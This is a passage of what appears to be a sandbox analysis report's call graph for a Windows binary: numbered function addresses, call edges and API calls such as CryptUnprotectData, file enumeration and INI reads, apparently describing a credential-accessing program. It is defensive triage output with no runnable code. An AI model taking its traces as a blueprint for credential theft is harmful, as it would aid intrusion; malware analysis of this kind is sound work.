38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab free free 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39233 4442e6 11 API calls 39235 44469e 39233->39235 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235->39231 39489 443d90 110 API calls 39235->39489 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39242 416935 16 API calls 39241->39242 39242->39273 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39261 416935 16 API calls 39257->39261 39456 43302c 39258->39456 39261->39273 39262 43302c memset 39263 444609 39262->39263 39263->39273 39462 416935 39263->39462 39265 444646 39470 434d4b 39265->39470 39273->39233 39546 438460 39274->39546 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39634 424f07 11 API calls 39280->39634 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39636 4250f8 39283->39636 39635 4446ea 11 API calls 39284->39635 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39644 4384e9 134 API calls 39288->39644 39645 424f74 123 API calls 39288->39645 39289 415c7d 16 API calls 39289->39286 39291->39295 39646 424ff0 13 API calls 39291->39646 39294->39288 39295->39289 39296 425266 39296->39295 39647 415be9 memcpy 39296->39647 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 free 39322->39323 39324 40cf14 39323->39324 39350 40b1ab free free 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 free 39331->39332 39333 40cc15 39332->39333 39334 40aa04 free 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab free free 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 free 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy free free 39377->39399 39379 40cedd 39380 40aa04 free 39379->39380 39381 40cee5 39380->39381 39382 40aa04 free 39381->39382 39383 40ceed 39382->39383 39384 40aa04 free 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy free free 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39490 415378 memcpy memcpy 39402->39490 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39491 4446ea 11 API calls 39424->39491 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39432 416935 16 API calls 39430->39432 39433 444381 39431->39433 39434 416935 16 API calls 39431->39434 39432->39433 39433->39245 39434->39433 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39492 432cc4 memset memset memcpy 39437->39492 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39493 41b7d9 39445->39493 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39511 41b321 100 API calls 39449->39511 39507 41519d 39450->39507 39453->39449 39510 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39510 39455->39256 39457 433033 39456->39457 39458 433042 39456->39458 39525 421f20 memset 39457->39525 39526 415a91 39458->39526 39461 43303f 39461->39262 39463 41693e 39462->39463 39467 41698e 39462->39467 39465 41694c 39463->39465 39530 422fd1 memset 39463->39530 39465->39467 39531 4165a0 11 API calls 39465->39531 39467->39265 39468 416972 39468->39467 39532 422b84 15 API calls 39468->39532 39471 434d5c 39470->39471 39533 432e5a 39471->39533 39473 434d76 39474 434d8d 39473->39474 39543 44405e 17 API calls 39473->39543 39539 415c7d 39474->39539 39477 434d97 39489->39231 39491->39433 39492->39439 39499 41b812 39493->39499 39494 415a6d memset 39495 41b8c2 39494->39495 39496 41b980 39495->39496 39497 41b902 memcpy memcpy memcpy memcpy memcpy 39495->39497 39502 41b849 39495->39502 39504 41b9ad 39496->39504 39513 4151e3 39496->39513 39497->39496 39499->39502 39506 41b884 39499->39506 39512 444706 11 API calls 39499->39512 39501 41ba12 39501->39502 39503 41ba32 memset 39501->39503 39502->39447 39503->39502 39504->39502 39516 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39504->39516 39506->39494 39506->39502 39517 4175ed 39507->39517 39510->39449 39511->39455 39512->39506 39515 41837f 54 API calls 39513->39515 39514 4151f9 39514->39504 39515->39514 39516->39501 39518 417570 SetFilePointer GetLastError GetLastError 39517->39518 39519 4175ff 39518->39519 39520 41760a ReadFile 39519->39520 39521 4151b3 39519->39521 39522 417637 39520->39522 39523 417627 GetLastError 39520->39523 39521->39453 39522->39521 39524 41763e memset 39522->39524 39523->39521 39524->39521 39525->39461 39527 415a9d 39526->39527 39528 415ab3 39527->39528 39529 415aa4 memset 39527->39529 39528->39461 39529->39528 39530->39465 39531->39468 39532->39467 39534 432e98 39533->39534 39535 415a91 memset 39534->39535 39538 432ed0 39534->39538 39536 432f34 39535->39536 39537 432f3b memcpy 39536->39537 39536->39538 39537->39538 39538->39473 39540 415c81 39539->39540 39541 415c9c 39539->39541 39540->39541 39542 416935 16 API calls 39540->39542 39541->39477 39542->39541 39543->39474 39558 41703f 39546->39558 39548 43847a 39549 43848a 39548->39549 39550 43847e 39548->39550 39565 438270 39549->39565 39595 4446ea 11 API calls 39550->39595 39555 4384bb 39556 438270 133 API calls 39555->39556 39557 438488 39556->39557 39557->39276 39559 417044 39558->39559 39560 41705c 39558->39560 39564 417055 39559->39564 39597 416760 11 API calls 39559->39597 39561 417075 39560->39561 39598 41707a 11 API calls 39560->39598 39561->39548 39564->39548 39566 415a91 memset 39565->39566 39567 43828d 39566->39567 39568 438297 39567->39568 39569 438341 39567->39569 39571 4382d6 39567->39571 39570 415c7d 16 API calls 39568->39570 39599 44358f 39569->39599 39573 438458 39570->39573 39574 4382fb 39571->39574 39575 4382db 39571->39575 39573->39557 39596 424f26 122 API calls 39573->39596 39630 415c23 memcpy 39574->39630 39576 416935 16 API calls 39575->39576 39578 4382e9 39576->39578 39580 415c7d 16 API calls 39578->39580 39579 438305 39582 44358f 19 API calls 39579->39582 39584 438318 39579->39584 39580->39568 39581 438373 39588 438383 39581->39588 39631 4300e8 memset memset memcpy 39581->39631 39582->39584 39584->39581 39625 43819e 39584->39625 39586 4383f5 39591 438404 39586->39591 39592 43841c 39586->39592 39587 4383cd 39587->39586 39633 42453e 122 API calls 39587->39633 39588->39587 39632 415c23 memcpy 39588->39632 39594 416935 16 API calls 39591->39594 39593 416935 16 API calls 39592->39593 39593->39568 39594->39568 39595->39557 39596->39555 39597->39564 39598->39559 39600 4435be 39599->39600 39601 443676 39600->39601 39604 4436ce 39600->39604 39607 442ff8 19 API calls 39600->39607 39609 44366c 39600->39609 39623 44360c 39600->39623 39602 443737 39601->39602 39605 442ff8 19 API calls 39601->39605 39608 443758 39601->39608 39606 442ff8 19 API calls 39602->39606 39603 441409 memset 39603->39608 39611 4165ff 11 API calls 39604->39611 39605->39602 39606->39608 39607->39600 39608->39603 39613 443775 39608->39613 39612 4169a7 11 API calls 39609->39612 39610 4437be 39614 416760 11 API calls 39610->39614 39615 4437de 39610->39615 39611->39601 39612->39601 39613->39610 39619 415c56 11 API calls 39613->39619 39614->39615 39616 42463b memset memcpy 39615->39616 39618 443801 39615->39618 39616->39618 39617 443826 39621 43bd08 memset 39617->39621 39618->39617 39620 43024d memset 39618->39620 39619->39610 39620->39617 39622 443837 39621->39622 39622->39623 39624 43024d memset 39622->39624 39623->39584 39624->39622 39626 438246 39625->39626 39628 4381ba 39625->39628 39626->39581 39627 41f432 109 API calls 39627->39628 39628->39626 39628->39627 39629 41f638 103 API calls 39628->39629 39629->39628 39630->39579 39631->39588 39632->39587 39633->39586 39634->39282 39635->39286 39637 425108 39636->39637 39643 42510d 39636->39643 39680 424f74 123 API calls 39637->39680 39640 42516e 39642 415c7d 16 API calls 39640->39642 39641 425115 39641->39288 39642->39641 39643->39641 39648 42569b 39643->39648 39644->39288 39645->39288 39646->39296 39647->39295 39659 4256f1 39648->39659 39676 4259c2 39648->39676 39653 4260dd 39692 424251 119 API calls 39653->39692 39654 429a4d 39661 429a66 39654->39661 39662 429a9b 39654->39662 39658 422aeb memset memcpy memcpy 39658->39659 39659->39654 39659->39658 39664 4260a1 39659->39664 39673 4259da 39659->39673 39674 429ac1 39659->39674 39659->39676 39679 425a38 39659->39679 39681 4227f0 memset memcpy 39659->39681 39682 422b84 15 API calls 39659->39682 39683 422b5d memset memcpy memcpy 39659->39683 39684 422640 13 API calls 39659->39684 39686 4241fc 11 API calls 39659->39686 39687 42413a 89 API calls 39659->39687 39693 415c56 11 API calls 39661->39693 39663 429a96 39662->39663 39695 416760 11 API calls 39662->39695 39696 424251 119 API calls 39663->39696 39690 415c56 11 API calls 39664->39690 39666 429a7a 39694 416760 11 API calls 39666->39694 39691 416760 11 API calls 39673->39691 39675 425ad6 39674->39675 39697 415c56 11 API calls 39674->39697 39675->39640 39676->39675 39685 415c56 11 API calls 39676->39685 39679->39676 39688 422640 13 API calls 39679->39688 39689 4226e0 12 API calls 39679->39689 39680->39643 39681->39659 39682->39659 39683->39659 39684->39659 39685->39673 39686->39659 39687->39659 39688->39679 39689->39679 39690->39673 39691->39653 39692->39675 39693->39666 39694->39663 39695->39663 39696->39674 39697->39673 39698->38759 39699->38767 39700 44dea5 39701 44deb5 FreeLibrary 39700->39701 39702 44dec3 39700->39702 39701->39702 39703 4147f3 39706 414561 39703->39706 39705 414813 39707 41456d 39706->39707 39708 41457f GetPrivateProfileIntW 39706->39708 39711 4143f1 memset _itow WritePrivateProfileStringW 39707->39711 39708->39705 39710 41457a 39710->39705 39711->39710 39712 44def7 39713 44df07 39712->39713 39714 44df00 ??3@YAXPAX 39712->39714 39715 44df17 39713->39715 39716 44df10 ??3@YAXPAX 39713->39716 39714->39713 39717 44df27 39715->39717 39718 44df20 ??3@YAXPAX 39715->39718 39716->39715 39719 44df37 39717->39719 39720 44df30 ??3@YAXPAX 39717->39720 39718->39717 39720->39719 39721 4287c1 39722 4287d2 39721->39722 39723 429ac1 39721->39723 39724 428818 39722->39724 39725 42881f 39722->39725 39740 425711 39722->39740 39735 425ad6 39723->39735 39791 415c56 11 API calls 39723->39791 39758 42013a 39724->39758 39786 420244 96 API calls 39725->39786 39729 4260dd 39785 424251 119 API calls 39729->39785 39733 4259da 39784 416760 11 API calls 39733->39784 39736 429a4d 39742 429a66 39736->39742 39743 429a9b 39736->39743 39739 422aeb memset memcpy memcpy 39739->39740 39740->39723 39740->39733 39740->39736 39740->39739 39745 4260a1 39740->39745 39754 4259c2 39740->39754 39757 425a38 39740->39757 39774 4227f0 memset memcpy 39740->39774 39775 422b84 15 API calls 39740->39775 39776 422b5d memset memcpy memcpy 39740->39776 39777 422640 13 API calls 39740->39777 39779 4241fc 11 API calls 39740->39779 39780 42413a 89 API calls 39740->39780 39787 415c56 11 API calls 39742->39787 39744 429a96 39743->39744 39789 416760 11 API calls 39743->39789 39790 424251 119 API calls 39744->39790 39783 415c56 11 API calls 39745->39783 39747 429a7a 39788 416760 11 API calls 39747->39788 39754->39735 39778 415c56 11 API calls 39754->39778 39757->39754 39781 422640 13 API calls 39757->39781 39782 4226e0 12 API calls 39757->39782 39759 42014c 39758->39759 39762 420151 39758->39762 39801 41e466 96 API calls 39759->39801 39761 420162 39761->39740 39762->39761 39763 4201b3 39762->39763 39764 420229 39762->39764 39765 4201b8 39763->39765 39766 4201dc 39763->39766 39764->39761 39767 41fd5e 85 API calls 39764->39767 39792 41fbdb 39765->39792 39766->39761 39771 4201ff 39766->39771 39798 41fc4c 39766->39798 39767->39761 39771->39761 39773 42013a 96 API calls 39771->39773 39773->39761 39774->39740 39775->39740 39776->39740 39777->39740 39778->39733 39779->39740 39780->39740 39781->39757 39782->39757 39783->39733 39784->39729 39785->39735 39786->39740 39787->39747 39788->39744 39789->39744 39790->39723 39791->39733 39793 41fbf8 39792->39793 39796 41fbf1 39792->39796 39806 41ee26 39793->39806 39797 41fc39 39796->39797 39816 4446ce 11 API calls 39796->39816 39797->39761 39802 41fd5e 39797->39802 39799 41ee6b 85 API calls 39798->39799 39800 41fc5d 39799->39800 39800->39766 39801->39762 39804 41fd65 39802->39804 39803 41fdab 39803->39761 39804->39803 39805 41fbdb 85 API calls 39804->39805 39805->39804 39807 41ee41 39806->39807 39808 41ee32 39806->39808 39817 41edad 39807->39817 39820 4446ce 11 API calls 39808->39820 39811 41ee3c 39811->39796 39814 41ee58 39814->39811 39822 41ee6b 39814->39822 39816->39797 39826 41be52 39817->39826 39820->39811 39821 41eb85 11 API calls 39821->39814 39823 41ee70 39822->39823 39824 41ee78 39822->39824 39864 41bf99 85 API calls 39823->39864 39824->39811 39827 41be6f 39826->39827 39828 41be5f 39826->39828 39833 41be8c 39827->39833 39858 418c63 memset memset 39827->39858 39857 4446ce 11 API calls 39828->39857 39830 41be69 39830->39811 39830->39821 39833->39830 39834 41bf3a 39833->39834 39835 41bed1 39833->39835 39838 41bee7 39833->39838 39861 4446ce 11 API calls 39834->39861 39837 41bef0 39835->39837 39840 41bee2 39835->39840 39837->39838 39839 41bf01 39837->39839 39838->39830 39862 41a453 85 API calls 39838->39862 39841 41bf24 memset 39839->39841 39843 41bf14 39839->39843 39859 418a6d memset memcpy memset 39839->39859 39847 41ac13 39840->39847 39841->39830 39860 41a223 memset memcpy memset 39843->39860 39846 41bf20 39846->39841 39848 41ac52 39847->39848 39849 41ac3f memset 39847->39849 39852 41ac6a 39848->39852 39863 41dc14 19 API calls 39848->39863 39850 41acd9 39849->39850 39850->39838 39853 41519d 6 API calls 39852->39853 39854 41aca1 39852->39854 39853->39854 39854->39850 39855 41acc0 memset 39854->39855 39856 41accd memcpy 39854->39856 39855->39850 39856->39850 39857->39830 39858->39833 39859->39843 39860->39846 39861->39838 39863->39852 39864->39824 39865 417bc5 39867 417c61 39865->39867 39870 417bda 39865->39870 39866 417bf6 UnmapViewOfFile CloseHandle 39866->39866 39866->39870 39869 417c2c 39869->39870 39877 41851e 18 API calls 39869->39877 39870->39866 39870->39867 39870->39869 39872 4175b7 39870->39872 39873 4175d6 CloseHandle 39872->39873 39874 4175c8 39873->39874 39875 4175df 39873->39875 39874->39875 39876 4175ce Sleep 39874->39876 39875->39870 39876->39873 39877->39869 39878 4152c6 malloc 39879 4152e2 39878->39879 39880 4152ef 39878->39880 39882 416760 11 API calls 39880->39882 39882->39879 39883 4148b6 FindResourceW 39884 4148cf SizeofResource 39883->39884 39887 4148f9 39883->39887 39885 4148e0 LoadResource 39884->39885 39884->39887 39886 4148ee LockResource 39885->39886 39885->39887 39886->39887 39888 441b3f 39898 43a9f6 39888->39898 39890 441b61 40071 4386af memset 39890->40071 39892 44189a 39893 4418e2 39892->39893 39895 442bd4 39892->39895 39894 4418ea 39893->39894 40072 4414a9 12 API calls 39893->40072 39895->39894 40073 441409 memset 39895->40073 39899 43aa20 39898->39899 39906 43aadf 39898->39906 39900 43aa34 memset 39899->39900 39899->39906 39901 43aa56 39900->39901 39902 43aa4d 39900->39902 40074 43a6e7 39901->40074 40082 42c02e memset 39902->40082 39906->39890 39908 43aad3 40084 4169a7 11 API calls 39908->40084 39909 43aaae 39909->39906 39909->39908 39924 43aae5 39909->39924 39910 43ac18 39913 43ac47 39910->39913 40086 42bbd5 memcpy memcpy memcpy memset memcpy 39910->40086 39914 43aca8 39913->39914 40087 438eed 16 API calls 39913->40087 39918 43acd5 39914->39918 40089 4233ae 11 API calls 39914->40089 39917 43ac87 40088 4233c5 16 API calls 39917->40088 40090 423426 11 API calls 39918->40090 39922 43ace1 40091 439811 162 API calls 39922->40091 39923 43a9f6 160 API calls 39923->39924 39924->39906 39924->39910 39924->39923 40085 439bbb 22 API calls 39924->40085 39926 43acfd 39931 43ad2c 39926->39931 40092 438eed 16 API calls 39926->40092 39928 43ad19 40093 4233c5 16 API calls 39928->40093 39930 43ad58 40094 44081d 162 API calls 39930->40094 39931->39930 39934 43add9 39931->39934 39934->39934 40098 423426 11 API calls 39934->40098 39935 43ae3a memset 39936 43ae73 39935->39936 40099 42e1c0 146 API calls 39936->40099 39937 43adab 40096 438c4e 162 API calls 39937->40096 39938 43ad6c 39938->39906 39938->39937 40095 42370b memset memcpy memset 39938->40095 39942 43adcc 40097 440f84 12 API calls 39942->40097 39943 43ae96 40100 42e1c0 146 API calls 39943->40100 39946 43aea8 39949 43aec1 39946->39949 40101 42e199 146 API calls 39946->40101 39948 43af00 39948->39906 39953 43af1a 39948->39953 39954 43b3d9 39948->39954 39949->39948 40102 42e1c0 146 API calls 39949->40102 39950 43add4 39955 43b60f 39950->39955 40161 438f86 16 API calls 39950->40161 40103 438eed 16 API calls 39953->40103 39959 43b3f6 39954->39959 39964 43b4c8 39954->39964 39955->39906 40162 4393a5 17 API calls 39955->40162 39958 43af2f 40104 4233c5 16 API calls 39958->40104 40144 432878 12 API calls 39959->40144 39961 43af51 40105 423426 11 API calls 39961->40105 39963 43b4f2 40151 43a76c 21 API calls 39963->40151 39964->39963 40150 42bbd5 memcpy memcpy memcpy memset memcpy 39964->40150 39966 43af7d 40106 423426 11 API calls 39966->40106 39970 43af94 40107 423330 11 API calls 39970->40107 39971 43b529 40152 44081d 162 API calls 39971->40152 39972 43b462 40146 423330 11 API calls 39972->40146 39976 43b544 39980 43b55c 39976->39980 40153 42c02e memset 39976->40153 39977 43b428 39977->39972 40145 432b60 16 API calls 39977->40145 39978 43afca 40108 423330 11 API calls 39978->40108 39979 43b47e 39982 43b497 39979->39982 40147 42374a memcpy memset memcpy memcpy memcpy 39979->40147 40154 43a87a 162 API calls 39980->40154 40148 4233ae 11 API calls 39982->40148 39985 43afdb 40109 4233ae 11 API calls 39985->40109 39988 43b4b1 40149 423399 11 API calls 39988->40149 39990 43b56c 39993 43b58a 39990->39993 40155 423330 11 API calls 39990->40155 39992 43afee 40110 44081d 162 API calls 39992->40110 40156 440f84 12 API calls 39993->40156 39994 43b4c1 40158 42db80 162 API calls 39994->40158 39999 43b592 40157 43a82f 16 API calls 39999->40157 40002 43b5b4 40159 438c4e 162 API calls 40002->40159 40004 43b5cf 40160 42c02e memset 40004->40160 40006 43b005 40006->39906 40011 43b01f 40006->40011 40111 42d836 162 API calls 40006->40111 40007 43b1ef 40121 4233c5 16 API calls 40007->40121 40009 43b212 40122 423330 11 API calls 40009->40122 40011->40007 40119 423330 11 API calls 40011->40119 40120 42d71d 162 API calls 40011->40120 40013 43b087 40112 4233ae 11 API calls 40013->40112 40016 43b22a 40123 42ccb5 11 API calls 40016->40123 40019 43b23f 40124 4233ae 11 API calls 40019->40124 40020 43b10f 40115 423330 11 API calls 40020->40115 40022 43b257 40125 4233ae 11 API calls 40022->40125 40026 43b129 40116 4233ae 11 API calls 40026->40116 40027 43b26e 40126 4233ae 11 API calls 40027->40126 40030 43b09a 40030->40020 40113 42cc15 19 API calls 40030->40113 40114 4233ae 11 API calls 40030->40114 40032 43b282 40127 43a87a 162 API calls 40032->40127 40033 43b13c 40117 440f84 12 API calls 40033->40117 40035 43b29d 40128 423330 11 API calls 40035->40128 40038 43b15f 40118 4233ae 11 API calls 40038->40118 40039 43b2af 40041 43b2b8 40039->40041 40042 43b2ce 40039->40042 40129 4233ae 11 API calls 40041->40129 40130 440f84 12 API calls 40042->40130 40045 43b2c9 40132 4233ae 11 API calls 40045->40132 40046 43b2da 40131 42370b memset memcpy memset 40046->40131 40049 43b2f9 40133 423330 11 API calls 40049->40133 40051 43b30b 40134 423330 11 API calls 40051->40134 40053 43b325 40135 423399 11 API calls 40053->40135 40055 43b332 40136 4233ae 11 API calls 40055->40136 40057 43b354 40137 423399 11 API calls 40057->40137 40059 43b364 40138 43a82f 16 API calls 40059->40138 40061 43b370 40139 42db80 162 API calls 40061->40139 40063 43b380 40140 438c4e 162 API calls 40063->40140 40065 43b39e 40141 423399 11 API calls 40065->40141 40067 43b3ae 40142 43a76c 21 API calls 40067->40142 40069 43b3c3 40143 423399 11 API calls 40069->40143 40071->39892 40072->39894 40073->39895 40075 43a6f5 40074->40075 40076 